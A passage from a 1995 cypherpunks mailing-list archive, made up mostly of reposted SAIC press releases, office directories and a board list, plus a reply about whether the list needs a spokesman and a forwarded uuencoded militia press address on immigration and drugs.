efforts at
   the border," said Dr. Donald M. Kerr, executive corporate 
vice
   president of SAIC.
   
   SAIC also provides other vehicle tracking systems that can 
trace the
   movements of railroad cars and detect motorists who evade 
barriers
   such as railroad grade crossings. The high-technology 
company also has
   developed methods of tracing small motorized boats, 
submersibles and
   even swimmers crossing strategic waterways, as well as other 
imaging
   applications.
   
   SAIC provides services and products to government and the 
private
   sector in the areas of law enforcement, transportation, 
energy,
   environment, health care and systems integration. With 
annual revenues
   of $1.9 billion, the company and its subsidiaries have 
nearly 20,000
   employees and more than 300 locations worldwide.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:19:06 PDT
To: cypherpunks@toad.com
Subject: SAIC's FBI ID System
Message-ID: <199509301118.HAA21682@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/news/news8-23-94.html


   *** About SAIC ***
   
     
_________________________________________________________________

   
   SAIC TEAM TO DEVELOP MULTIMILLION-DOLLAR
   FBI IDENTIFICATION SYSTEM
   
   (MCLEAN, VA,) August 23, 1994 -- SAIC (Science Applications
   International Corporation) has won a major contract to 
design and
   develop the FBI's Interstate Identification Index computer 
system.
   This system is an on-line criminal history database which 
will support
   federal, state, and local law enforcement agencies via the 
National
   Crime Information Center network.
   
   Under the 8-year contract, the SAIC team will design, 
implement, and
   provide operations and maintenance support for the 
Interstate
   Identification Index. The contract has an estimated value of 
$27.6
   million.
   
   "The Interstate Identification Index project contributes to 
our
   company's goals to provide quality technical products and 
services for
   the security and well-being of our nation," said SAIC 
Project Manager
   Shelley Parker. "SAIC has been working for the FBI in this 
area for
   the last 10 years. Our expertise and personal commitment to 
this
   program made it particularly important to the company."
   
   Development and integration work will be performed in SAIC's 
Software
   and System Integration Group in the McLean, VA facility by a 
team of
   engineers who have worked for many years on this 
application. The team
   will be augmented by new staff members with specialized 
expertise for
   the new system.
   
   SAIC provides innovative services and products to government 
and the
   private sector in the areas of systems integration, energy,
   environment and transportation. The company, which is the 
largest
   employee-owned high-technology firm in the nation, has 
annual revenues
   of $1.67 billion and 16,000 employees in more than 250 
locations
   worldwide.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:33:30 PDT
To: cypherpunks@toad.com
Subject: SAIC in VA
Message-ID: <199509301133.HAA22001@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/va.html


   **** Business Directory ****
     
_________________________________________________________________

   
                               SAIC IN VIRGINIA
                                       
     * Alexandria
          + Alexandria/Eisenhower Ave. (Loc. 238)
          + Alexandria/DMSO (Loc. 692)
          + Alexandria/DTG (Loc. 691)
          + Alexandria/JHK (Loc. 801)
          + Alexandria/MARITIME SERV DIV (Loc. 365)
          + Alexandria/TSC (Loc. 694)
          + Washington D.C./AMSEC (Loc.347)
     * Arlington
          + Arlington/Jefferson Davis HWY (Loc. 294)
          + Arlington/AMSEC (Loc. 678)
          + Arlington/BALLSTON (Loc. 765)
          + Arlington/CAPS (Loc. 785)
          + Arlington/CM (Loc. 573)
          + Arlington/CON. SUP. Facility (Loc. 964)
          + Arlington/CSI ADV. APP. DIV. (Loc. 963)
          + Arlington/CSM & AT (Loc. 402)
          + Arlington/CSS (Loc. 309)
          + Arlington/FSD (Loc. 784)
          + Arlington/ICITAP (Loc. 769)
          + Arlington/LEO (Loc. 587)
          + Arlington/MOSES (Loc. 612)
          + Arlington/RDO (Loc. 783)
          + Arlington/SAI T (Loc. 329)
          + Arlington/SCT (Loc. 830)
          + Arlington/SEM (Loc. 711)
          + Arlington/SIM. TECH (Loc. 717)
          + Arlington/SIM. TECH (Loc. 990)
          + Arlington/TRG (Loc. 539)
          + Arlington/TRG (Loc. 668)
          + Arlington/TTG (Loc. 708)
          + Crystal City (Loc. 508)
          + Virginia Square/ATG (Loc. 215)
     * Dahlgren
          + Dahlgren/Danube Drive (Loc. 226)
          + Dahlgren/AMSEC (Loc. 716)
     * Chantilly
          + Chantilly/NSI (Loc. 944)
     * Falls Church
          + Falls Church/EHSG (Loc. 052)
          + Falls Church/HCTG (Loc. 456)
          + Falls Church/SKYLINE/TAG (Loc. 284)
     * Ft. Belvoir
          + Ft. Belvoir (Loc. 709)
     * Hampton
          + Hampton/Enterprise Parkway (Loc. 761)
          + Hampton/Enterprise Parkway (Loc. 833)
          + Hampton/Enterprise Parkway (Loc. 256)
          + Hampton/Command & Control (Loc. 550)
          + Hampton/NASA LANGLEY (Loc. 618)
     * Herndon
          + Herndon/TAG (Loc. 946)
     * King George
          + King George/NAVSWC (Loc. 924)
     * Lynchburg
          + Lynchburg/Timberlake Road (Loc. 212)
     * McLean
          + McLean (Loc. 049)
          + McLean/COMSYSTEMS (Loc. 092)
          + McLean/ENTERPRISE CENTER (Loc. 747)
          + McLean/TE&A (Loc. 741)
          + McLean/TOWER (Loc. 015)
     * Newington
          + Newington/CVR (Loc. 474)
     * Norfolk
          + Norfolk/Plume Street (Loc. 441)
          + Norfolk/RE WRIGHT (Loc. 931)
     * Petersburg
          + Petersburg/NSSSG (Loc. 638)
     * Portsmouth
          + Tidewater/CHCS (Loc. 649)
     * Reston
          + Reston/EITS (Loc. 641)
     * Richmond
          + Richmond/NSI (Loc. 951)
     * Virginia Beach
          + Virginia Beach/SEG (Loc. 282)
          + Corp Office/AMSEC (Loc. 346)
            
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:35:27 PDT
To: cypherpunks@toad.com
Subject: SAIC in MD
Message-ID: <199509301135.HAA22051@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/md.html


   **** Business Directory ****
     
_________________________________________________________________

   
                               SAIC IN MARYLAND
                                       
     * Abingdon
          + Abingdon/Continental Drive (Loc. 591)
     * Annapolis
          + Annapolis/TRG (Loc. 178)
          + Annapolis/WOR (Loc. 241)
     * Baltimore
          + Baltimore/White Marsh (Loc. 221)
     * Bethesda
          + Bethesda/CHCS (Loc. 498)
     * California
          + California/SCT (Loc. 827)
     * Columbia
          + Columbia/Ideas Group (Loc. 905)
          + Columbia/MSO (Loc. 473)
          + Columbia/SSIG (Loc. 315)
     * Fort Ritchie
          + Ft. Ritchie (Loc. 700)
     * Frederick
          + Frederick (Loc. 519)
          + Frederick/FCRDC (Loc. 970)
          + Frederick/PAI (Loc. 512)
          + Frederick/PAI Amin. Office (Loc. 575)
          + Frederick/Spectrum Drive (Loc. 750)
     * Gaithersburg
          + Gaithersburg/Professional Drive (Loc. 134)
          + Gaithersburg/QUINCE DIAMOND (Loc. 725)
          + Gaithersburg/UTILITY SVCS (Loc. 555)
     * Germantown
          + Germantown/Century Blvd. (Loc. 292)
          + Germantown/BELLEMEADE III (Loc. 854)
     * Hagerstown
          + Hagerstown/DTG (Loc. 652)
     * Hanover
          + Hanover/Ashton Road (Loc. 745)
     * Joppatowne
          + Joppatowne/SAIC (Loc. 220)
          + Joppatowne/TDG (Loc. 303)
     * Lanham
          + Maryland/SYNTONIC (Loc. 860)
     * Laurel
          + Laurel/GSC (Loc. 661)
     * Rockville
          + Rockville/ NSI (Loc. 953)
     * Silver Spring
          + Silver Spring/ADELPHI (Loc. 908)
          + Silver Spring/WHITE OAK (Loc. 563)
     * Towson
          + Towson/JHK (Loc. 803)
     * Westminister
          + Westminister/RE WRIGHT (Loc. 930)
            
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:44:17 PDT
To: cypherpunks@toad.com
Subject: SAIC Global Web
Message-ID: <199509301144.HAA22231@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/index.html


   *** Business Directory ***
     
_________________________________________________________________

   
U.S. Locations Alphabetical List

 o Alabama         o Illinois        o Nebraska        o Rhode 
Island
 o Alaska          o Indiana         o Nevada          o South 
Carolina
 o Arizona         o Kansas          o New Hampshire   o South 
Dakota
 o Arkansas        o Kentucky        o New Jersey      o 
Tennessee
 o California      o Louisiana       o New Mexico      o Texas
 o Colorado        o Maryland        o New York        o Utah
 o Connecticut     o Massachusetts   o North Carolina  o 
Virginia
 o Delaware        o Michigan        o North Dakota    o 
Washington
 o Florida         o Minnesota       o Ohio            o 
Washington D.C.
 o Georgia         o Mississippi     o Oklahoma        o West 
Virginia
 o Hawaii          o Missouri        o Oregon          o 
Wisconsin
 o Idaho           o Montana         o Pennsylvania    o 
Wyoming

     
_________________________________________________________________

   
    Last updated on 07-05-95

----------


URL: http://www.saic.com/business/locations/others.html


   *** Business Directory ***
     
_________________________________________________________________

   
International Locations Alphabetical List

  CANADA
     * Halifax
     * Montreal
     * Ottawa
     * Vancouver
       
  COLOMBIA
  
     * Colombia, LTDA.
       
  FRANCE
  
     * Paris La Defense/EUROPE (Loc. 596)
       
  GERMANY
  
     * Germany
     * Kaiserslautern/SCT (Loc. 826)
     * Landstuhl/CHCS
       
  HONG KONG

     * Hong Kong (Loc. 789)
       
  ICELAND

     * Keflavik/CHCS
       
  MEXICO

     * Mexico City
       
  RUSSIA

     * Moscow/MIR (Loc. 764)
       
  SPAIN

     * IBERSAIC (Loc. 693)
       
  UNITED KINGDOM

     * Aberdeen (Loc. 797)
     * Aberdeen/SAIC Ltd (Loc. 728)
     * Birmingham
     * Camberly UK/SAIT (Loc. 666)
     * Cambridge/TOP EXPRESS (Loc. 340)
     * IBM SAIC (Loc. 667)
     * London/Andrew Palmer (Loc. 798)
     * Meriden (Loc. 865)
     * Stockley Park (Loc. 884)
       
  
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:47:48 PDT
To: cypherpunks@toad.com
Subject: SAIC in CA
Message-ID: <199509301147.HAA23372@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/ca.html


   **** Business Directory ****
     
_________________________________________________________________

   
                              SAIC IN CALIFORNIA
                                       
     * Anaheim
          + Anaheim/JHK (Loc. 807)
     * APO AP
          + Guam/Naval Hospital/CHCS (Loc. 984)
          + Japan/ETG (Loc. 427)
          + Japan/Misawa AB/CHCS (Loc. 987)
          + Japan/Okinawa/USNH/CHCS (Loc. 986)
          + Japan/Yokosuka/CHCS (Loc. 601)
          + Japan/Yokota AB/CHCS (Loc. 988)
          + Korea/COMSYS (Loc. 740)
          + Korea/ETG (Loc. 426)
          + Korea/Kunsan AB/CHCS (Loc. 576)
          + Korea/Osan AB/CHCS (Loc. 985)
     * Burlingame
          + Burlingame/EPRI (Loc.721)
     * Camarillo
          + Camarillo/Camino Ruiz (Loc. 161)
     * Camp Pendleton
          + Camp Pendleton/CHCS (Loc. 818)
     * Cardiff
          + Cardiff/ATLAS (Loc. 790)
     * Citrus Heights
          + Citrus Heights/NSI (Loc. 956)
     * Corona
          + Corona/AMSEC (Loc. 262)
     * Cupertino
          + Cupertino/Baywood Drive (Loc. 636)
     * Edwards AFB
          + Edwards AFB/CHCS (Loc. 883)
     * El Segundo
          + El Segundo/ASP (Loc. 328)
     * Emeryville
          + Emeryville/Berkeley/DTG (Loc. 251)
          + Emeryville/JHK (Loc. 804)
     * Fort Irwin
          + Fort Irwin/CHCS (Loc. 782)
     * Fountain Valley
          +
          + Fountain Valley/MSO (Loc. 57)
     * Goleta
          + Goleta/MARIPRO (Loc. 182)
     * Laguna Hills
          + Laguna Hills/DTG (Loc.331)
     * La Jolla
          + La Jolla/Cave Street (Loc. 450)
          + La Jolla/1200 Prospect (Loc. 626)
          + La Jolla/1299 Prospect (Loc. 544)
          + La Jolla/ITER (Loc. 623)
     * Lancaster
          + Lancaster (Loc. 938)
     * Lawndale
          + Lawndale/SCT (Loc. 823)
     * Lemoore
          + Lemoore/CHCS (Loc. 781)
     * Los Altos
          + Los Altos/El Camino Real (Loc. 008)
     * Los Angeles
          + Los Angeles AFB/CHCS (Loc. 885)
          + Los Angeles/Century City (Loc. 124)
          + Los Angeles/UCLA/Div. 284 (Loc. 605)
     * McClellan
          + McClellan AFB/TTG (Loc. 787)
     * Moffett Field
          + Moffett Field (Loc. 834)
          + Moffett Field (Loc. 920)
          + Moffett Field (Loc. 922)
     * Monterey
          + Monterey/Camino El Estero (Loc. 098)
     * Oxnard
          + Oxnard/AMSEC (Loc. 159)
     * Palo Alto
          + Palo Alto/SCT (Loc. 829)
     * Pasadena
          + Pasadena/JHK (Loc. 805)
     * Pleasanton
          + Pleasanton/Hopyard Road (Loc. 029)
     * Poway
          + Poway (Loc. 962)
   
     * Pt. Hueneme
          + Pt. Hueneme/CHCS (Loc. 841)
     * Ridgecrest
          + Ridgecrest/STG (Loc. 336)
     * Riverside
          + Riverside/JHK (Loc. 810)
          + Riverside/NSI (Loc. 955)
     * San Bernardino
          + San Bernardino/NSI (Loc. 945)
     * Sacramento
          + Sacramento/LEO (Loc. 580)
     * San Diego
          + San Diego/AMSEC (Loc. 348)
          + San Diego/Campus Pt. A (Loc. 245)
          + San Diego/Campus Pt. C(Loc. 001)
          + San Diego/Campus Pt. D
   (Loc. 094)
     * San Diego/Campus Pt. E (Loc. 461)
     * San Diego/Campus Pt. F (Lco. 399)
     * San Diego/Campus Pt. G (Loc. 599)
     * San Diego/Campus Pt. K (Loc. 548)
     * San Diego/CHCS (Loc. 703)
     * San Diego/ESG (Loc. 973)
     * San Diego/Fourwinds (Loc. 312)
     * San Diego/MARITIME SERV DIV (Loc. 363)
     * San Diego/MEG (Loc. 677)
     * San Diego/MTO (Loc. 408)
     * San Diego/Old Town (Loc. 552)
     * San Diego/SAIC (Loc. 218)
     * San Diego/SAI T/Camus Pt. B (Loc. 291)
     * San Diego/SAI T/STPG (Loc. 358)
     * San Diego/SCRIPPS (Loc. 869)
     * San Diego/SED(668)/FCTCPAC (Loc. 673)
     * San Diego/SEG (Loc. 332)
     * San Diego/Wateridge (Loc. 021)
     * Sorrento Valley/(CSG) MANUFACTURING (Loc. 553)
     * Sorrento Valley/REC RES RET (Loc. 413)
     * Sorrento Valley/REMOTE SYS FAC (Loc. 337)
     * Sorrento Valley/SAI T (Loc. 002)
     * Sorrento Valley/SEA (Loc. 676)
       
   San Francisco
     * San Francisco/JDA (Loc. 933)
     * San Francisco/TSC (Loc. 457)
       
   San Jose
     * San Jose/C&I (Loc. 333)
       
   Santa Barbara
     * Santa Barbara/Ekwill Street (Loc. 216)
     * Santa Barbara/State Street (Loc. 786)
     * Santa Barbara/CSG (Loc. 431)
     * Santa Barbara/PSG (Loc. 439)
       
   Santa Clara
     * Santa Clara/Patrick Henry Drive (Loc. 007)
       
   Santa Ynez
     * Santa Ynez/Sagunto Street (Loc. 420)
       
   Thousand Oaks
     * Thousand Oaks/DTG (Loc. 730)
       
   Torrance
     * Torrance/Western Avenue (Loc. 005)
       
   Travis AFB
     * David Grant USAF MED CTR/CHCS (Loc. 671)
       
   Vallejo
     * Vallejo/COMSYS (Loc. 243)
     * Vandenberg AFB (Loc. 598)
     * Vandenberg AFB/CHCS (Loc. 882)
       
   Walnut Creek
     * Walnut Creek/HCTG (Loc. 518)
       
   Woodland Hills
     * Woodland Hills/JHK (Loc. 811)
       
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:51:14 PDT
To: cypherpunks@toad.com
Subject: SAIC Directors
Message-ID: <199509301151.HAA23472@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL:
http://www.saic.com/corporate/annual-reports/1995/directors.html


   Board of Directors
     
_________________________________________________________________

   
   [IMAGE] J.R. Beyster
   Chairman of the Board and
   Chief Executive Officer, SAIC

   [IMAGE] L.A. Kull
   President and Chief Operating
   Officer, SAIC

   [IMAGE] A.L. Alm
   Sector Vice President, SAIC

   [IMAGE] V.N. Cook
   Chairman, Visions
   International, Inc.

   [IMAGE] S.J. Dalich
   Executive Vice President, SAIC

   [IMAGE] C.K. Davis
   International Health Care
   Consultant

   [IMAGE] W.H. Demisch
   Managing Director, BT
   Securities Corp.

   [IMAGE] E.A. Frieman
   Director, Scripps Institution of
   Oceanography; Vice Chancellor
   of Marine Sciences, UCSD

   [IMAGE] J.E. Glancy
   Corporate Executive Vice
   President, SAIC

   [IMAGE] F. Herwood
   SAIC Director Emeritus

   [IMAGE] D.A. Hicks
   Chairman, Hicks & Associates,
   a subsidiary of SAIC

   [IMAGE] B.R. Inman
   Admiral, USN (Ret.)

   [IMAGE] D.M. Kerr
   Corporate Executive Vice
   President, SAIC

   [IMAGE] M.R. Laird
   Senior Counselor, National
   and International Affairs, The
   Readers Digest Association Inc.

   [IMAGE] W.M. Layson
   Senior Vice President, SAIC

   [IMAGE] C.B. Malone
   President, Financial & Management Consulting Inc.

   [IMAGE] J.W. McRary
   President and Chief Executive
   Officer, Microelectronics and
   Computer Technology Corp.

   [IMAGE] B.J. Shillito
   SAIC Director Emeritus

   [IMAGE] E.A. Straker
   Executive Vice President, SAIC

   [IMAGE] M.R. Thurman
   General, USA (Ret.)

   [IMAGE] M.E. Trout
   Chairman Emeritus,
   American Healthcare Systems

   [IMAGE] J.H. Warner, Jr.
   Executive Vice President,
   SAIC

   [IMAGE] J.A. Welch
   General, USAF (Ret.)

   [IMAGE] J.B. Wiesler
   Vice Chairman, Bank of
   America (Ret.)

   [IMAGE] W.E. Zisch
   SAIC Director Emeritus
     
_________________________________________________________________

   
   Table of Contents More
     
_________________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 05:00:40 PDT
To: cypherpunks@toad.com
Subject: SAIC in DC
Message-ID: <199509301200.IAA23661@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/business/locations/dc.html


   **** Business Directory ****
     
_________________________________________________________________

   
                            SAIC IN WASHINGTON D.C.
                                       
     * P.O.S.T. (Loc. 126)
     * Walter Reed/CHCS (Loc. 497)
     * Walter Reed/GOV'T AFFAIRS (Loc. 235)
     * Washington D.C./SEASG (Loc. 288)
     * Washington D.C/CHEMONICS XPT (Loc. 821)
     * Washington D.C/ITG (Loc. 704)
     * Washington D.C./NSI (Loc. 969)
     * Washington D.C./OCRW (Loc. 482)
     * Washington D.C/QATSS HQ (Loc. 729)
     * Washington D.C./TCI (Loc. 991)
       
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-06-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 30 Sep 95 08:59:48 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: <Pine.SUN.3.91.950930082349.14142A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 30 Sep 1995, Jiri Baum wrote:

> It seems to me that there are two viewpoints, 
>   * a spokesman would be useful, and
>   * a spokesman cannot be appointed due to lack of org
> 
> Which both seem to be true to me . . .

Well, neither seems true to me.  I don't see how, in the first
analysis, a spokesman would be useful to ME.  I am a Cypherpunk
by virtue of being on the mailing list, but I doubt most, and
certainly not all, list members would agree with everything I 
believe about privacy, encryption, freedom and the government.
I know I don't believe in a lot of the stuff I read here.  Why
would any of us want a spokesman other than themselves?  So I
ask, "useful" to whom?

Second, the reason a spokesman cannot be appointed is not due
to lack of [an?] organization, but rather the lack of any
unifying creedo or statement of belief.  Had the list founders
said, "Cypherpunks is a list for people who believe X, Y and
Z.  Sign-up if you are one of us."  Then we might have an
"official" viewpoint which a spokesperson could help
articulate.  They didn't, we don't and, frankly, that's the
way I like it.

You want to express your views to the press?  Knock yourself
out.  You want to call yourself a "Cypherpunk"?  No one will
stop you.  You want to characterize what other Cypherpunks
say and believe?  You might say something I disagree with,
but again, no one will stop you.  (Of course, they may counter
your free speech with some free speech of their own, but that's
the name of the game.)

Yours in anarchy,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "FELIX R. WILSON SR." <ASICEO@internetMCI.COM>
Date: Sat, 30 Sep 95 07:22:21 PDT
To: "lindat@iquest.net>
Subject: Re: Operation Stop The Aliens
Message-ID: <01HVVTH9ORWY8ZEKWD@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --
 Attachment: natltr.txt Code: 00H7GFL   \ Created: 09-29-95, 06:21 PM [34 Kb]

The Attached File Is For Viewing It I In Text Format Please Forward To
Everyone on the net work. and post to every board " Please.." 
//BEGIN BINARY MAIL SEGMENT:
begin 644 natltr.txt
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("!&<F]M.B!$96%N($-O;7!T;VX@("`@("`@("`@("`@("`@("`@
M("`@("`@.2\R.2\Y-2`@,38Z,#0Z,38@(%!A9V4@,B!O9B`Q,@T*3D%424].
M04P@04Q,24%.0T4@3T8@0TA225-424%.($U)3$E424$-"@T*#0H-"@T*#0H-
M"@T*("`@("`@("`@("`@("`@5&AE(&9A;&QO=VEN9R!I<R!T:&4@97AA8W0@
M=&5X="!O9B!T:&4@861D<F5S<R!T;R!T:&4@<')E<W,@;V8@5&AU<G-D87DL
M#0H@("`@("`@("`@("`@("!397!T96UB97(@,C$L(#$Y.34L(&=I=F5N(&)Y
M($1E86X@0V]M<'1O;B!O9B!T:&4@3D%#32!A;F0@=&AE($Y!55--+B`@5&AI
M<PT*("`@("`@("`@("`@("`@861D<F5S<V]U=&QI;F5S3U!%4D%424].(%!2
M3U1%0U1!345224-!+@T*#0H@("`@("`@("`@("`@("!9;W4@;6%Y(')E<')I
M;G0L(&-O<'DL(&]R(&1I<W1R:6)U=&4@4%)/5DE$140@=&AE('1E/BAT(&ES
M(&YO="!A;'1E<F5D(&EN#0H@("`@("`@("`@("`@("!A;GD@=V%Y+@T*#0H@
M("`@("`@("`@("`@("!&;VQL;W=I;F<@=&AE(%1E/BAT(&]F($%D9')E<W,@
M:7,@=&AE($=!3R!R97!O<G0@=VAI8V@@:7,@<')O=FED960@9F]R#0H@("`@
M("`@("`@("`@("!B86-K9W)O=6YD(&EN9F]R;6%T:6]N+@T*#0H@("`@("`@
M("`@("`@("!4:&%N:R!Y;W4@86QL(&9O<B!Y;W5R('-U<'!O<G0@86YD('EO
M=7(@<')A>65R<RX@($UA>2!A;&P@9VQO<GD@8F4@=&\@1V]D#0H@("`@("`@
M("`@("`@("!!;&UI9VAT>2P@1F%T:&5R+"!3;VX@86YD($AO;'D@1VAO<W0N
M("!!;65N+@T*#0H-"B`@("`@("`@("`@("`@($YA=&EO;F%L($%L;&EA;F-E
M(&]F($-H<FES=&EA;B!-:6QI=&EA("8-"B`@("`@("`@("`@("`@($YA=&EO
M;F%L($%L;&EA;F-E(&]F(%4N4RX@36EL:71I80T*#0H@("`@("`@("`@("`@
M("!03R!"3U@@,3<S#0H@("`@("`@("`@("`@("!32$E.1TQ%5$]73BP@0T$@
M.38P.#@-"B`@("`@("`@("`@("`@("@Y,38I-#<T+3,T-38-"@T*("`@("`@
M("`@("`@("`@3F]T93H@06YY(')E9F5R96YC92!T;R!712!42$4@4$5/4$Q%
M(&EN('1H92!A9&1R97-S(&UE86YS(&%L;"!O9B!T:&4@<&5O<&QE#0H@("`@
M("`@("`@("`@("!W:&\@87)E(&-I=&EZ96YS(&]F('1H92!54R!A;F0@=&AE
M('-E=F5R86P@<V]V97)E:6=N('-T871E(%)E<'5B;&EC<RX@($ET#0H@("`@
M("`@("`@("`@("!I<R!N;W0@82!R969E<F5N8V4@=&\@86YY('-P96-I9FEC
M(&=R;W5P+"`B5T4@5$A%(%!%3U!,12(L('-U8V@@87,-"B`@("`@("`@("`@
M("`@('!O<G1R87EE9"!O;B!!0D,@3F5W<RP@=VAI8V@@:G5S="!H87!P96YE
M9"!T;R!C;VYV96YI96YT;'D@9F]L;&]W('1H92!P<F5S<PT*("`@("`@("`@
M("`@("`@8V]N9F5R96YC92!4:'5R<V1A>2!N:6=H="X@($Y!0TTO3D%54TTL
M(&]R(&%N>2!A9F9I;&EA=&5S+"!$3R!.3U0@<F5C96EV90T*("`@("`@("`@
M("`@("`@86YY(&9U;F1I;F<@9G)O;2!A;GD@<W5C:"!G<F]U<"P@;F]R(&1O
M('=E(&%D=F]C871E('1H92!V:6]L96YT(&]V97)T:')O=PT*("`@("`@("`@
M("`@("`@;V8@=&AE($QE9VET:6UA=&5L>2!#;VYS=&ET=71E9"!';W9E<FYM
M96YT+@T*#0H,("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@1G)O;3H@1&5A;B!#;VUP=&]N("`@("`@
M("`@("`@("`@("`@("`@("`@("`@(#DO,CDO.34@(#$V.C`T.C,X("!086=E
M(#,@;V8@,3(-"DY!5$E/3D%,($%,3$E!3D-%($]&($-(4DE35$E!3B!-24Q)
M5$E!#0H-"@T*#0H-"@T*#0H-"@T*("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("!/4$52051)3TX@4%)/5$5#5$%-15))0T$-"@T*("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("!);G1R;V1U8W1I;VX@*&YO
M="!R97!R:6YT960I#0H-"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@5$585"!O9B!!1$1215-3#0H-"@T*("`@("`@("`@("`@("`@
M("!-;W-T($%M97)I8V%N<R!H879E('-E96X@=&AE(')E<&]R=',@;VX@=&5L
M979I<VEO;B!O<B!I;B`@=&AE("!N97=S<')I;G0L("!O<@T*("`@("`@("`@
M("`@("`@("!H879E(&AE87)D('1H96T@;VX@<F%D:6\L(&%B;W5T(&$@8W)I
M<VES(&EN('1H:7,@8V]U;G1R>2X@(%1H92`@8W)I<VES("!T:&5S90T*("`@
M("`@("`@("`@("`@("!R97!O<G1S(&ED96YT:69Y(&ES('1W;RUF;VQD#0H-
M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@,2D@26QL96=A
M;"!);6UI9W)A=&EO;@T*("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@*&%N9"D-"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@,BD@5')A9F9I8R!I;B!);&QE9V%L($1R=6=S#0H-"B`@("`@("`@
M("`@("`@("`@5V4@87)E(&%L;"!A=V%R92!O9B!T:&4@969F96-T<R!O9B!D
M<G5G<R!O;B!C=7(@8V]M;75N:71I97,L(&-O=6YT;&5S<PT*("`@("`@("`@
M("`@("`@("!L:79E<R!H879E(&)E96X@9VEV96X@=7`@=&\@9&5A=&@@86YD
M(&1E<W1R=6-T:6]N(&1U92`@=&\@('1H97-E("!D<G5G<RP@(&%N9`T*("`@
M("`@("`@("`@("`@("!E8V]N;VUI8V%L;'D@=V4@:&%V92!S<&5N="!":6QL
M:6]N<R!F:6=H=&EN9R!T:&5S92!E9F9E8W1S(&%N9"`@=&AE:7(@(&-A=7-E
M+@T*#0H@("`@("`@("`@("`@("`@($UO<F4@=&AA;B`R,#`@>65A<G,@86=O
M('1H:7,@;F%T:6]N('=A<R!F;W)M960L(&%S(&$@56YI;VXL("!T;R`@<')O
M=FED92`@9F]R#0H@("`@("`@("`@("`@("`@('1H92!C;VUM;VX@9&5F96YS
M92`H86UO;F<@;W1H97(@<'5R<&]S97,I+B`@5&AI<R!5;FEO;BP@:&5L9"!T
M;V=E=&AE<B!B>0T*("`@("`@("`@("`@("`@("!T:&4@9G)A;65W;W)K(&MN
M;W=N(&%S('1H92!#;VYS=&ET=71I;VXL(&AA<R!S97)V960@87,@=&AE(&UO
M9&5L(&]F($9R965D;VT-"B`@("`@("`@("`@("`@("`@9F]R('1H92!E;G1I
M<F4@=V]R;&0N#0H-"B`@("`@("`@("`@("`@("`@270@:&%S(&)E96XL(&%T
M(&QE87-T(&EN('1H92!P87-T+"!O8G9I;W5S('1O(&%L;"!T:&%T('1H92!F
M;W5N9&%T:6]N(&]N#0H@("`@("`@("`@("`@("`@('=H:6-H('1H:7,@0V]N
M<W1I='5T:6]N86P@9G)A;65W;W)K(&]F('1H92!5;FEO;B`@:&%S("!B965N
M("!R97-T:6YG("!I<R`@=&AE#0H@("`@("`@("`@("`@("`@(&-O;F-E<'0@
M;V8G3$E&12P@3$E"15)462P@86YD('1H92!055)354E4(&]F($A!4%!)3D53
